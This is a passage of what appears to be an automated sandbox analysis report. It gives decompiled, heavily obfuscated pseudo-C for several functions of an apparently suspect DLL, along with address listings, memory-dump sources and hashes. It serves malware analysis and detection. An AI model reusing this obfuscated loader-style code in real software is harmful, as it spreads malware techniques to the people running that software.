						_t362 = _a32;
						_t374 = _v24;
						_v25 = _t287;
					}
					_t363 =  &(_t362[1]);
					_t343 = _v20 & 0x0000ffff;
					 *((intOrPtr*)(_a4 + 0x70 + ( *_t362 & 0x0000ffff) * 8)) =  *((intOrPtr*)(_a4 + 0x70 + ( *_t362 & 0x0000ffff) * 8)) + (0x00001b71 - _t343 -  *0x6d55d5a0 |  *(_a4 + ( *_t362 & 0x0000ffff) * 4));
					 *((intOrPtr*)(_a40 + _t343 * 4)) = 0x1b99;
					_t289 =  *0x6d55d5b8; // 0x0
					_t367 =  *0x6d55d5ac; // 0x0
					_t290 = _t289 - 1;
					 *0x6d55d5b8 = _t290;
					while(_t367 != 0x948) {
						_t226 =  *0x6d55d5c8; // 0x0
						asm("cdq");
						_t290 =  *(_t226 + ( *_t363 & 0x0000ffff) * 8) / _t290;
						_t229 = 4;
						asm("cdq");
						_t230 = _t229 /  *0x6d55d5d8;
						 *0x6d55d5b8 = _t290;
						__eflags = _t230 - 0xca2;
						if(_t230 != 0xca2) {
							_t302 = _a40;
							__eflags =  *((intOrPtr*)(_t302 + _t367 * 4)) - _t230;
							if( *((intOrPtr*)(_t302 + _t367 * 4)) >= _t230) {
								L27:
								 *0x6d55d57c = _t367;
								 *0x6d55d5c0 =  *0x6d55d5c0 + 0xaa;
								_t235 = (_v16[0xbeb] & 0x0000ffff) % 0x124f;
								asm("cdq");
								__eflags = _t235 % _t290;
								_t290 = _t235 / _t290;
								 *0x6d55d5b8 = _t290;
							} else {
								_t241 =  *0x6d55d5ac; // 0x0
								__eflags =  *0x6d55d590 - _t241; // 0x0
								if(__eflags == 0) {
									goto L27;
								}
							}
						} else {
							_t242 =  *0x6d55d570; // 0x0
							_t291 = _a12;
							 *(_t242 + ( *_t363 & 0x0000ffff) * 4) = _t291;
							asm("cdq");
							_t245 =  *0x6d55d598; // 0x0
							 *((short*)(_a8 + 0xa + _t245 * 8)) = 0x1000 % _t367;
							_t246 =  *0x6d55d578; // 0x0
							 *((intOrPtr*)(_a40 + _t246 * 4)) =  *((intOrPtr*)(_a40 + _t367 * 8));
							_t248 = _v25 + 1;
							_t308 =  *_t363 & 0x0000ffff;
							_v25 = _t248;
							_t363 = _t363 - 2;
							asm("cdq");
							 *0x6d55d5ac = ((_t248 & 0x000000ff) / _t291 |  *(_t374 + 0x14 + _t308 * 4)) -  *0x6d55d5ac;
							_t363[0xcaa] = _t363[ *0xcaa] + 0xca2;
							_t290 =  *0x6d55d5b8; // 0x0
						}
						_t367 = _t367 + 1;
						__eflags = _t367;
					}
					L30:
					_t239 =  *(( *_t363 & 0x0000ffff) * 3 + _a20) & 0x000000ff;
				}
				return _t239 + 4;
			}





























































            0x6d517562
            0x6d517569
            0x6d517577
            0x6d51757e
            0x6d517582
            0x6d517587
            0x6d51758c
            0x6d517591
            0x6d517596
            0x6d5175a2
            0x6d5175a5
            0x6d5175b2
            0x6d5175b8
            0x6d5175d0
            0x6d5175d4
            0x6d5175e6
            0x6d5175ea
            0x6d5175f0
            0x6d5175f7
            0x6d5175fd
            0x6d5175fe
            0x6d517606
            0x6d51764e
            0x6d517659
            0x6d51765f
            0x6d517800
            0x6d517800
            0x6d51780b
            0x6d517813
            0x6d51781d
            0x6d517830
            0x6d517835
            0x6d51783f
            0x6d517842
            0x6d517848
            0x00000000
            0x6d51784e
            0x6d51784e
            0x6d517852
            0x6d517860
            0x6d517864
            0x6d51786a
            0x6d51786f
            0x6d517870
            0x6d517878
            0x6d51787b
            0x6d51787c
            0x6d51787c
            0x00000000
            0x6d517884
            0x00000000
            0x6d517665
            0x6d517668
            0x6d51766c
            0x6d517676
            0x6d51767d
            0x6d51767f
            0x6d5177fc
            0x00000000
            0x6d517685
            0x6d517685
            0x6d51768b
            0x6d51768f
            0x6d517697
            0x6d517782
            0x6d517788
            0x6d51779d
            0x6d51779d
            0x6d5177a3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d51778a
            0x6d517795
            0x6d51779b
            0x6d5177a5
            0x6d5177a5
            0x6d5177af
            0x00000000
            0x6d5177b5
            0x6d5177b5
            0x6d5177cb
            0x6d5177d1
            0x6d5177e6
            0x6d5177f3
            0x6d5177f3
            0x00000000
            0x00000000
            0x00000000
            0x6d51779b
            0x6d51769d
            0x6d5176b6
            0x6d5176bd
            0x6d5176c5
            0x6d5176cb
            0x6d5176d9
            0x6d5176da
            0x6d5176da
            0x6d5176e4
            0x6d5176e8
            0x6d5176e8
            0x6d5176ec
            0x6d5176ec
            0x00000000
            0x6d5176ec
            0x6d517697
            0x6d51767f
            0x6d517608
            0x6d517611
            0x6d51761c
            0x6d517620
            0x6d51762b
            0x6d517632
            0x6d517637
            0x6d51763d
            0x6d517641
            0x6d5176f0
            0x6d5176f0
            0x6d5176fa
            0x6d517700
            0x6d517706
            0x6d51770a
            0x6d517710
            0x6d517714
            0x6d517717
            0x6d51771c
            0x6d51771f
            0x6d517722
            0x6d517724
            0x6d517725
            0x6d51772a
            0x6d51772e
            0x6d517732
            0x6d517736
            0x6d517736
            0x6d51773d
            0x6d517748
            0x6d51775b
            0x6d517763
            0x6d51776a
            0x6d517770
            0x6d517776
            0x6d517777
            0x6d51796d
            0x6d51788c
            0x6d51789b
            0x6d51789e
            0x6d5178a0
            0x6d5178a1
            0x6d5178a2
            0x6d5178a8
            0x6d5178ae
            0x6d5178b0
            0x6d517923
            0x6d517927
            0x6d51792a
            0x6d517939
            0x6d51793e
            0x6d517944
            0x6d51795f
            0x6d517961
            0x6d517962
            0x6d517964
            0x6d517966
            0x6d51792c
            0x6d51792c
            0x6d517931
            0x6d517937
            0x00000000
            0x00000000
            0x6d517937
            0x6d5178b2
            0x6d5178b5
            0x6d5178ba
            0x6d5178be
            0x6d5178c6
            0x6d5178c9
            0x6d5178d2
            0x6d5178db
            0x6d5178e3
            0x6d5178ea
            0x6d5178ec
            0x6d5178ef
            0x6d5178f3
            0x6d5178f9
            0x6d51790b
            0x6d517917
            0x6d51791b
            0x6d51791b
            0x6d51796c
            0x6d51796c
            0x6d51796c
            0x6d517979
            0x6d517983
            0x6d517983
            0x6d517991

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fe980fde2beba3e22a16f980f392df891148e2d185dd2a5426662d3c9feca7e
            • Instruction ID: 39ab13582fb1eb93f7712a70c62c541e1bd4257b16c4e52cc107789d2250670a
            • Opcode Fuzzy Hash: 3fe980fde2beba3e22a16f980f392df891148e2d185dd2a5426662d3c9feca7e
            • Instruction Fuzzy Hash: 27D15776A09211CFDB05CF19C490A29B7F1FBCA308F16446EF986C7B91D7B4A851CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D519CD2 Relevance: .2, Instructions: 239COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D519CD2() {
				signed int _t175;
				signed int _t211;
				void* _t225;
				signed int _t226;
				void* _t229;
				void* _t230;
				signed int _t232;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t244;
				intOrPtr _t247;
				intOrPtr _t250;
				intOrPtr _t252;
				intOrPtr _t253;
				signed int _t260;
				signed int _t262;
				void* _t265;
				signed int _t269;
				intOrPtr _t274;
				void* _t277;
				void* _t280;
				signed int _t282;
				signed int _t285;
				void* _t286;
				intOrPtr* _t287;
				intOrPtr _t288;
				void* _t289;
				void* _t290;

				_t241 =  *((intOrPtr*)(_t290 + 0x2c));
				_t288 =  *((intOrPtr*)(_t290 + 0x2c));
				_t269 =  *((intOrPtr*)(_t290 + 0x18)) + 0xb56;
				_t286 = _t241 + 0x505;
				 *((intOrPtr*)(_t290 + 0x38)) =  *((intOrPtr*)(_t290 + 0x14)) + 0x977;
				_t242 = _t241 + 0xfffff946;
				 *((intOrPtr*)(_t290 + 0x24)) = _t242;
				_t237 = _t288 + 0x616;
				if(_t269 < _t242 + 0xa7f) {
					L37:
					return  *((intOrPtr*)(_t290 + 0x18)) + 0x81;
				}
				if( *((intOrPtr*)(_t290 + 0x2c)) + 0x2c4 > _t286 + 0x2de) {
					_t244 =  *((intOrPtr*)(_t290 + 0x2c));
					_t282 =  *(_t244 + 0x3c);
					if(_t286 >= _t282 *  *(_t290 + 0x3c)) {
						if(_t286 >  *((intOrPtr*)(_t244 + 0x13c)) -  *((intOrPtr*)(_t244 + 0xbc)) &&  *((intOrPtr*)(_t244 + 0x80)) >= (_t269 & 0x00002c90) - _t288) {
							 *(_t244 + 0xd0) = ( *((intOrPtr*)(_t290 + 0x1c)) + 0xffffdd6e) *  *(_t244 + 0xd0);
						}
					} else {
						if(_t286 !=  *(_t244 + 0xe8) * _t237) {
							 *(_t244 + 0xd0) =  *(_t244 + 0xd0) - ( *(_t244 + 0x1c) |  *(_t244 + 0x10));
						} else {
							_t175 = ( *((intOrPtr*)(_t244 + 0x148)) -  *((intOrPtr*)(_t244 + 0xf8))) *  *(_t244 + 0x158) * 0x2ac3;
							 *(_t244 + 0x158) = _t175;
							 *((intOrPtr*)(_t244 + 0x74)) =  *((intOrPtr*)(_t244 + 0x74)) - (_t175 -  *((intOrPtr*)(_t290 + 0x28)) | 0x00002ac3);
							 *(_t244 + 0x2c) =  *(_t244 + 0x2c) | _t282 ^ _t237;
						}
					}
					L36:
					goto L37;
				}
				_t287 =  *((intOrPtr*)(_t290 + 0x2c));
				_t285 = 0x2b78;
				 *(_t287 + 0x11c) =  *((intOrPtr*)(_t287 + 0x40)) -  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x70)) + 0x34));
				_t247 =  *((intOrPtr*)(_t287 + 0x124));
				 *(_t287 + 0x148) =  *(_t287 + 0x148) |  *((intOrPtr*)(_t287 + 0x24)) - 0x00001e7b;
				 *((intOrPtr*)(_t287 + 0x190)) =  *((intOrPtr*)(_t287 + 0x190)) + 0x484c;
				_t23 = _t247 + 0x1d4; // 0x32333dc0
				 *(_t287 + 0x30) =  *(_t287 + 0x30) + 0xffffd488 -  *_t23;
				if( *(_t287 + 0x11c) == 0) {
					L23:
					 *(_t287 + 0x158) =  *(_t287 + 0x148) | _t285;
					 *(_t287 + 0x108) = _t287 + 0x94;
					if( *((intOrPtr*)( *_t287 + 0x4c)) + 0x56d < _t285) {
						L25:
						 *(_t287 + 0x28) =  *(_t287 + 0x30) * 0x21e9;
						 *( *(_t287 + 0x108)) =  *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) ^ 0x6e724366;
						_t250 =  *_t287;
						if( *((intOrPtr*)(_t287 + 0x178)) != ( *(_t250 + 0x4c) ^ 0x00003bfe)) {
							 *(_t287 + 0x1a8) =  *(_t287 + 0x1a8) ^  *((intOrPtr*)(_t287 + 0xc4)) - 0x00002ea5;
						}
						if( *((intOrPtr*)(_t287 + 0xd0)) !=  *(_t287 + 0x2c)) {
							 *(_t287 + 0x158) =  *(_t287 + 0x158) + 0xffffd62f - _t250;
						}
						goto L36;
					} else {
						goto L24;
					}
					do {
						L24:
						 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x50)) + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30));
						 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30)) - 1;
						_t285 = _t285 + 1;
					} while (_t285 <=  *((intOrPtr*)( *_t287 + 0x4c)) + 0x56d);
					goto L25;
				}
				_t27 = _t247 + 0x4c; // 0xd4
				_t289 = 0;
				_t252 =  *((intOrPtr*)(_t287 + 0x70));
				_t239 =  *_t27 ^ 0x00002608;
				 *(_t290 + 0x10) = _t239;
				 *((intOrPtr*)(_t290 + 0x14)) = _t252;
				_t274 =  *((intOrPtr*)(_t252 + 0x78 + _t239 * 8)) +  *((intOrPtr*)(_t287 + 0x40));
				 *(_t287 + 0x17c) =  *(_t287 + 0x2c) | 0x00001df3;
				 *((intOrPtr*)(_t290 + 0x28)) = _t274;
				if( *((intOrPtr*)(_t252 + 0x7c + _t239 * 8)) <= 0) {
					goto L23;
				} else {
					goto L4;
				}
				do {
					L4:
					_t253 = _t274 + _t289;
					 *((intOrPtr*)(_t290 + 0x24)) = _t253;
					_t289 = _t289 + ( *(_t287 + 0x4c) ^ 0x00002605);
					 *(_t290 + 0x34) =  *(_t290 + 0x34) & 0x00000000;
					_t211 = ( *((intOrPtr*)(_t253 + 4)) - 8) /  *(_t287 + 0x1c) * 0x1d6f318a;
					_t274 =  *((intOrPtr*)(_t290 + 0x28));
					 *(_t290 + 0x30) = _t211;
					 *(_t290 + 0x3c) = _t274 + _t289;
					 *(_t287 + 0x28) = ( *(_t287 + 0x30) + 0x260d) *  *(_t287 + 0x28);
					if(_t211 != 0) {
						_t240 =  *(_t290 + 0x34);
						do {
							_t277 = 0x2ea5;
							if( *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) * 0x888075be < 0x2ea5) {
								L8:
								_t260 =  *(_t287 + 0x1c);
								_t289 = _t289 + (_t260 ^ 0x0000260f);
								_t262 =  *(_t287 + 0x80) ^ 0x00000a0b;
								 *(_t287 + 0x30) = (_t260 - 0x2749) *  *(_t287 + 0x30);
								_t280 = ( *( *(_t290 + 0x3c) + _t240 * 2) & 0xfff) +  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x24))));
								if(_t262 < 0x24ad) {
									L12:
									 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x50)) + 0x148)) =  *((intOrPtr*)(_t287 + 0x90));
									 *((intOrPtr*)(_t287 + 0x90)) =  *((intOrPtr*)(_t287 + 0x90)) + 1;
									_t225 = (( *( *(_t290 + 0x3c) + _t240 * 2) & 0x0000ffff) >> 0xc) - 1;
									if(_t225 == 0) {
										_t226 =  *(_t287 + 0x11e) & 0x0000ffff;
										L19:
										 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x40)) + _t280)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x40)) + _t280)) + _t226;
										goto L20;
									}
									_t229 = _t225 - 1;
									if(_t229 == 0) {
										_t226 =  *(_t287 + 0x11c) & 0x0000ffff;
										goto L19;
									}
									_t230 = _t229 - 1;
									if(_t230 == 0 || _t230 == 7) {
										_t226 =  *(_t287 + 0x11c);
										goto L19;
									} else {
										goto L20;
									}
								} else {
									_t232 =  *(_t287 + 0xd4);
									_t265 = _t262 + 0xffffdb54;
									goto L10;
									L10:
									_t232 = _t232 ^  *(_t287 + 0x130) ^ _t285;
									_t265 = _t265 - 1;
									if(_t265 != 0) {
										goto L10;
									} else {
										 *(_t287 + 0xd4) = _t232;
										goto L12;
									}
								}
							} else {
								goto L7;
							}
							do {
								L7:
								_t277 = _t277 + 1;
								 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x10)) + 0xbc)) =  *((intOrPtr*)(_t287 + 0x48)) - 0x29b2;
							} while (_t277 <=  *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) * 0x888075be);
							goto L8;
							L20:
							 *((intOrPtr*)(_t287 + 0x118)) =  *((intOrPtr*)(_t287 + 0x118)) + 0xffffd54d -  *((intOrPtr*)(_t287 + 0x90));
							_t240 = _t240 + 1;
						} while (_t240 <  *(_t290 + 0x30));
						_t239 =  *(_t290 + 0x10);
						_t274 =  *((intOrPtr*)(_t290 + 0x28));
					}
				} while (_t289 <  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x14)) + 0x7c + _t239 * 8)));
				goto L23;
			}


































            0x6d519cd4
            0x6d519ce7
            0x6d519ceb
            0x6d519cf2
            0x6d519cf8
            0x6d519cfc
            0x6d519d02
            0x6d519d06
            0x6d519d14
            0x6d51a06e
            0x6d51a07c
            0x6d51a07c
            0x6d519d2c
            0x6d519fd8
            0x6d519fdc
            0x6d519fe8
            0x6d51a045
            0x6d51a067
            0x6d51a067
            0x6d519fea
            0x6d519ff5
            0x6d51a02f
            0x6d519ff7
            0x6d51a00c
            0x6d51a012
            0x6d51a021
            0x6d51a024
            0x6d51a024
            0x6d519ff5
            0x6d51a06d
            0x00000000
            0x6d51a06d
            0x6d519d32
            0x6d519d36
            0x6d519d44
            0x6d519d4d
            0x6d519d58
            0x6d519d63
            0x6d519d6d
            0x6d519d73
            0x6d519d7d
            0x6d519f28
            0x6d519f35
            0x6d519f41
            0x6d519f50
            0x6d519f76
            0x6d519f7d
            0x6d519f92
            0x6d519f94
            0x6d519fa4
            0x6d519fb1
            0x6d519fb1
            0x6d519fc0
            0x6d519fcd
            0x6d519fcd
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d519f52
            0x6d519f52
            0x6d519f5e
            0x6d519f67
            0x6d519f6a
            0x6d519f72
            0x00000000
            0x6d519f52
            0x6d519d83
            0x6d519d86
            0x6d519d88
            0x6d519d8b
            0x6d519d99
            0x6d519d9d
            0x6d519da5
            0x6d519da8
            0x6d519dae
            0x6d519db6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d519dbc
            0x6d519dbc
            0x6d519dbf
            0x6d519dc7
            0x6d519dcb
            0x6d519dcd
            0x6d519de1
            0x6d519de3
            0x6d519de7
            0x6d519dee
            0x6d519dff
            0x6d519e04
            0x6d519e0a
            0x6d519e0e
            0x6d519e16
            0x6d519e21
            0x6d519e44
            0x6d519e44
            0x6d519e4e
            0x6d519e60
            0x6d519e66
            0x6d519e7b
            0x6d519e83
            0x6d519ea4
            0x6d519ead
            0x6d519eb7
            0x6d519ec4
            0x6d519ec7
            0x6d519ee9
            0x6d519ef0
            0x6d519ef3
            0x00000000
            0x6d519ef3
            0x6d519ec9
            0x6d519ecc
            0x6d519ee0
            0x00000000
            0x6d519ee0
            0x6d519ece
            0x6d519ed1
            0x6d519ed8
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d519e85
            0x6d519e85
            0x6d519e8b
            0x6d519e8b
            0x6d519e91
            0x6d519e97
            0x6d519e99
            0x6d519e9c
            0x00000000
            0x6d519e9e
            0x6d519e9e
            0x00000000
            0x6d519e9e
            0x6d519e9c
            0x00000000
            0x00000000
            0x00000000
            0x6d519e23
            0x6d519e23
            0x6d519e2f
            0x6d519e30
            0x6d519e40
            0x00000000
            0x6d519ef6
            0x6d519f01
            0x6d519f07
            0x6d519f08
            0x6d519f12
            0x6d519f16
            0x6d519f16
            0x6d519f1e
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 24f600c790e6cec38eafd9f5c81d36b2b3e00042096111a770172eaaa30d09b4
            • Instruction ID: 126fb8440d4357ec58ffd42a062e2b034a9d1d24529d7d7c74cd11ac4e5ed17d
            • Opcode Fuzzy Hash: 24f600c790e6cec38eafd9f5c81d36b2b3e00042096111a770172eaaa30d09b4
            • Instruction Fuzzy Hash: A1B117716087018FD368CF38C984A96B7E1FF88308F544A6EE5AA8BB51D731E946CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D501C6E Relevance: .2, Instructions: 231COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 92%
            			E6D501C6E(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				intOrPtr _t161;
				intOrPtr _t168;
				signed int _t172;
				signed int _t180;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int* _t200;
				signed int* _t222;
				signed char _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed char _t233;
				signed int _t237;
				intOrPtr _t239;
				signed int _t240;
				signed int _t244;
				signed int _t249;
				signed int _t252;
				signed int _t257;
				signed char _t258;
				signed int _t262;
				signed int _t263;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int* _t290;
				signed int _t293;
				void* _t302;
				void* _t305;

				_t153 =  *0x6d55d5c0; // 0x0
				_t224 = _a12 & 0x00001011;
				_v4 = _t153 & _a4 & 0x0000ffff;
				_t285 =  *0x6d55d5dc; // 0x0
				_v8 = _a28 & 0x000000ff;
				_t282 =  *0x6d55d57c; // 0x0
				_t6 = _t285 - 0x1cc; // -460
				_v20 = 0x1efe;
				_v12 = _t6;
				_t283 = _t282 + 0xf22;
				_t158 =  *0x6d55d598; // 0x0
				_t257 = _t158 + _a4 & 0x0000ffff;
				_t160 =  *0x6d55d5b4; // 0x0
				_a28 = _t160;
				_t161 =  *0x6d55d5a8; // 0x0
				_v16 = _t257;
				_t229 =  *(_t161 + 0x173e8);
				if(_t229 >= 0x426) {
					_t222 = (_t229 << 4) + _a20;
					do {
						 *_t222 =  *_t222 | 0x00002dd8;
						_t229 = _t229 + 1;
						_t222 =  &(_t222[4]);
					} while (_t229 >= 0x426);
					_t285 =  *0x6d55d5dc; // 0x0
				}
				_t293 = _a8;
				if(_t285 < 0x190c) {
					do {
						 *(( *0x6d55d5c0 & 0x0000ffff) + _t293) =  *(_t293 + _t285 * 2) ^ _t224 ^ 0x00000024;
						asm("cdq");
						 *0x6d55d5d8 =  *0x6d55d5d8 ^ 0x0000161b % _t285;
						_t285 = _t285 + 1;
					} while (_t285 < 0x190c);
					_t257 = _v16;
				}
				_t230 = _a16 & 0x000000ff;
				_t258 = _t257 + 0xffff;
				_t286 = _a20;
				 *0x6d55d580 = _t230 -  *0x6d55d580;
				_v16 = _t258;
				_a8 = _t258 & 0x000000ff;
				 *(_t286 + _t230 * 4) = 0x888 /  *(_t286 + _t230 * 4);
				_t233 = _a4 + 0xffff;
				_t262 = _t233 & 0x0000ffff;
				_t168 =  *0x6d55d594; // 0x0
				 *(_t262 + _t293) =  *(_t262 + _t293) + (_t233 & 0x000000ff) * ( *0x6d55d578 & 0x000000ff) -  *((intOrPtr*)(_t168 + 0xd54));
				 *0x6d55d578 =  *0x6d55d578 + 1;
				 *(_t262 + _t293) =  *(_t262 + _t293) & (_t224 - 0x0000004d |  *(_v12 + 0x17240));
				_t237 =  *0x6d55d598; // 0x0
				 *0x6d55d598 = _t237 + 1;
				if( *((intOrPtr*)(_t286 + _t237 * 4)) != 0x2e48) {
					L9:
					_t302 =  *0x6d55d5c4 - 0x648; // 0x0
					if(_t302 == 0) {
						goto L10;
					}
				} else {
					_v20 = 0x1efd;
					if( *((intOrPtr*)(_t286 + 0x7bf4)) >= 0x1bd4) {
						L10:
						asm("cdq");
						 *0x6d55d578 =  *0x6d55d578 + 1;
						 *0x6d55d5b4 =  *0x6d55d5b4 ^ 0x00000130;
						_t228 =  *0x6d55d5e4; // 0x0
						 *0x6d55d5d8 = (_a32 & 0x000000ff) %  *0x6d55d5d8;
						if(_t228 != 0xe8c) {
							_t249 = _t228 * _v20;
							_t200 = _t286 + _a12 * 4;
							_a4 = _t200;
							_a16 = 0x128a - _t283;
							_t290 = _t200;
							_a12 = _t249;
							do {
								 *0x6d55d5d4 = 0x1e24 -  *0x6d55d5d4;
								 *0x6d55d58c = _t249 %  *0x6d55d58c;
								_t305 =  *((intOrPtr*)(_v12 + _t228 * 4)) -  *0x6d55d5dc; // 0x0
								if(_t305 >= 0) {
									_a28 = _a28 + 1;
								} else {
									asm("cdq");
									asm("cdq");
									_t252 = _a16;
									 *(_t293 + (_a24 & 0x000000ff) * 2) = 0xca1 /  *0x6d55d5d8 / ( *(_t293 + (_a24 & 0x000000ff) * 2) & 0x000000ff);
									_t290 = _a4;
									asm("cdq");
									_t283 = _t283 + 1;
									_a16 = _t252 - 1;
									_t249 = _a12;
									 *0x6d55d5e0 = (_v16 & 0x0000ffff & _t252) /  *0x6d55d5e0;
								}
								_t249 = _t249 + _v20;
								_a12 = _t249;
								_t228 = _t228 + 1;
								 *_t290 = 0xfffffbe9 /  *_t290;
							} while (_t228 != 0xe8c);
							_t286 = _a20;
						}
					} else {
						goto L9;
					}
				}
				_t263 =  *0x6d55d578; // 0x0
				_t239 =  *0x6d55d5c8; // 0x0
				_t172 =  *0x6d55d5b4; // 0x0
				 *((intOrPtr*)(_t239 + _t263 * 4)) = _t172 -  *((intOrPtr*)(_t239 + _t263 * 4));
				 *0x6d55d578 =  *0x6d55d578 - 1;
				_t240 = _a28 & 0x000000ff;
				 *(_t286 + 0xb920) = _a8 &  *0x6d55d58c;
				_a4 = _t240;
				_t180 =  *0x6d55d5d4; // 0x0
				 *0x6d55d5b0 = (_v4 & 0x0000ffff | _t240) %  *0x6d55d5b0;
				_a16 = _t180;
				asm("cdq");
				_t244 =  *0x6d55d5dc; // 0x0
				_t284 = _t283 - 1;
				_t227 = _t244;
				_a20 = 0xe72 / ( *((intOrPtr*)(_v8 + _t180 * 4)) + _v20);
				if(_t227 > _t284) {
					_t195 =  *0x6d55d5cc; // 0x0
					asm("cdq");
					_a28 = 0x1d1e;
					_t196 = _t195 / _a28;
					do {
						_t244 = _t244 ^ _t196;
						_t227 = _t227 + 1;
						_t284 = _t284 - 1;
					} while (_t227 > _t284);
					 *0x6d55d5dc = _t244;
				}
				 *0x6d55d59c = 0xa90 -  *0x6d55d59c;
				 *((intOrPtr*)(_t286 + _a16 * 8)) = 0x761 -  *((intOrPtr*)(_t286 + _a16 * 8));
				 *((intOrPtr*)(_v12 + _a20 * 4)) =  *(_v12 + _a20 * 4) & 0x00000000;
				_t287 =  *0x6d55d5a0; // 0x0
				 *0x6d55d58c = (_a32 & 0x000000ff) %  *0x6d55d58c;
				 *(_t287 + _t293) = (_a4 &  *0x6d55d5b8) / ( *(_t287 + _t293) & 0x000000ff);
				_t193 =  *0x6d55d5bc; // 0x0
				return  *((intOrPtr*)(_t193 + 0x1448));
			}














































            0x6d501c71
            0x6d501c82
            0x6d501c89
            0x6d501c98
            0x6d501c9e
            0x6d501ca3
            0x6d501ca9
            0x6d501caf
            0x6d501cb7
            0x6d501cbb
            0x6d501cc1
            0x6d501cca
            0x6d501ccd
            0x6d501cd2
            0x6d501cd6
            0x6d501cdb
            0x6d501cdf
            0x6d501ce7
            0x6d501cee
            0x6d501cf2
            0x6d501cf2
            0x6d501cf8
            0x6d501cf9
            0x6d501cfc
            0x6d501d00
            0x6d501d00
            0x6d501d06
            0x6d501d10
            0x6d501d12
            0x6d501d22
            0x6d501d2a
            0x6d501d2d
            0x6d501d33
            0x6d501d34
            0x6d501d3c
            0x6d501d3c
            0x6d501d40
            0x6d501d45
            0x6d501d4b
            0x6d501d5a
            0x6d501d64
            0x6d501d70
            0x6d501d78
            0x6d501d85
            0x6d501d8b
            0x6d501d94
            0x6d501d9f
            0x6d501da6
            0x6d501db2
            0x6d501db5
            0x6d501dbf
            0x6d501dca
            0x6d501de0
            0x6d501de5
            0x6d501dec
            0x00000000
            0x00000000
            0x6d501dcc
            0x6d501dd6
            0x6d501dde
            0x6d501df2
            0x6d501df7
            0x6d501dfe
            0x6d501e04
            0x6d501e0e
            0x6d501e14
            0x6d501e20
            0x6d501e2c
            0x6d501e31
            0x6d501e3b
            0x6d501e3f
            0x6d501e43
            0x6d501e45
            0x6d501e49
            0x6d501e56
            0x6d501e67
            0x6d501e70
            0x6d501e76
            0x6d501ecb
            0x6d501e78
            0x6d501e8f
            0x6d501e9b
            0x6d501e9e
            0x6d501ea2
            0x6d501eaf
            0x6d501eb3
            0x6d501eba
            0x6d501ebc
            0x6d501ec0
            0x6d501ec4
            0x6d501ec4
            0x6d501ed1
            0x6d501eda
            0x6d501ee0
            0x6d501ee1
            0x6d501ee3
            0x6d501eef
            0x6d501eef
            0x00000000
            0x00000000
            0x00000000
            0x6d501dde
            0x6d501ef3
            0x6d501ef9
            0x6d501eff
            0x6d501f07
            0x6d501f0c
            0x6d501f1c
            0x6d501f21
            0x6d501f30
            0x6d501f3a
            0x6d501f43
            0x6d501f49
            0x6d501f59
            0x6d501f5c
            0x6d501f62
            0x6d501f63
            0x6d501f65
            0x6d501f6b
            0x6d501f6d
            0x6d501f72
            0x6d501f73
            0x6d501f7b
            0x6d501f7f
            0x6d501f7f
